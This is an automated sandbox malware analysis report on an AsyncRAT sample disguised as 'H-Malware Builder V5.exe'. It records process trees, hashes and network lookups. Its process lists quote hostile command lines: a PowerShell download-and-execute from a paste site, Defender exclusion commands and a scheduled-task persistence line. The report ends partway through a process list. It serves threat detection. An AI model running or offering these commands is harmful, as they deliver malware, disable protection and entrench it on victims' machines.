Analysis Overview
SHA256
c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
Threat Level: Known bad
The file H-Malware Builder V5.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 18:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 18:52
Reported
2024-06-19 18:52
Platform
win10v2004-20240508-en
Max time kernel
10s
Max time network
23s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2252 created 608 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Windows\system32\winlogon.exe |
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2252 set thread context of 1264 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" | C:\Windows\system32\svchost.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\SCHTASKS.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\SCHTASKS.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1d6b1314-e146-455d-ac22-8b1c5f39adf0}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\SYSTEM32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | pastie.io | udp |
| US | 8.8.8.8:53 | bay-helps.gl.at.ply.gg | udp |
Files
memory/372-0-0x00007FFB552B3000-0x00007FFB552B5000-memory.dmp
memory/372-1-0x0000000000960000-0x00000000009CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0g4er14.3dd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1380-7-0x0000029760550000-0x0000029760572000-memory.dmp
memory/1380-12-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-13-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-14-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-17-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
| MD5 | cc63633edfcc147cbaed1959b03d8730 |
| SHA1 | df7a250eba6ee1767b09f7923bfd735635deb9e8 |
| SHA256 | e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417 |
| SHA512 | a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4 |
memory/372-29-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/2252-31-0x000001CFA3190000-0x000001CFA31DE000-memory.dmp
memory/2252-34-0x00007FFB71F00000-0x00007FFB71FBE000-memory.dmp
memory/372-35-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/2252-33-0x00007FFB734D0000-0x00007FFB736C5000-memory.dmp
memory/2252-32-0x000001CFA4D80000-0x000001CFA4DBE000-memory.dmp
memory/1264-36-0x0000000140000000-0x0000000140040000-memory.dmp
memory/1264-37-0x0000000140000000-0x0000000140040000-memory.dmp
memory/2252-40-0x000001CFBD9B0000-0x000001CFBD9C2000-memory.dmp
memory/1264-39-0x00007FFB71F00000-0x00007FFB71FBE000-memory.dmp
memory/1264-38-0x00007FFB734D0000-0x00007FFB736C5000-memory.dmp
memory/316-54-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/508-61-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1172-81-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1216-85-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1216-84-0x000001A6EDCB0000-0x000001A6EDCDA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1172-80-0x000001BF90430000-0x000001BF9045A000-memory.dmp
memory/1140-78-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1140-77-0x0000027B672C0000-0x0000027B672EA000-memory.dmp
memory/1132-75-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1132-74-0x00000210C5060000-0x00000210C508A000-memory.dmp
memory/1124-72-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1124-71-0x000002A732340000-0x000002A73236A000-memory.dmp
memory/1016-69-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1016-68-0x0000027E7C9B0000-0x0000027E7C9DA000-memory.dmp
memory/508-60-0x00000246A9860000-0x00000246A988A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/952-57-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/952-56-0x0000025CD73D0000-0x0000025CD73FA000-memory.dmp
memory/316-53-0x0000024C8C100000-0x0000024C8C12A000-memory.dmp
memory/668-49-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/668-48-0x000002AF37B10000-0x000002AF37B3A000-memory.dmp
memory/608-45-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/608-44-0x00000294232A0000-0x00000294232CA000-memory.dmp
memory/608-43-0x0000029422ED0000-0x0000029422EF3000-memory.dmp
memory/1264-41-0x0000000140000000-0x0000000140040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\H-Malware Builder V5.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/3068-343-0x0000000000330000-0x000000000039C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3737c3eb5510d74c3d6ea770e9ff4ffb |
| SHA1 | 88148610a4f00560b06bc8607794d85f15bf3b64 |
| SHA256 | b716e0860cc27dd1035a125f44833c5999f4a0429635df6d97634f041b25effa |
| SHA512 | db4db804933ab50bf56130a939040e33a57e4ec056c9e0c598bcae86bbaf093e2a22fd4ec8801f6b029985170f17859a931e63f28a7abb4f91780da2a33e1ebc |
memory/5048-376-0x0000000000A30000-0x0000000000A9C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 18:52
Reported
2024-06-19 18:55
Platform
win7-20240221-en
Max time kernel
53s
Max time network
146s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Executes dropped EXE
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\Tasks\$77Stub.exe | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Stub.exe | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2200d1fc-b5e3-44f4-89c8-7829bdc43f62}
C:\Windows\System32\cmd.exe
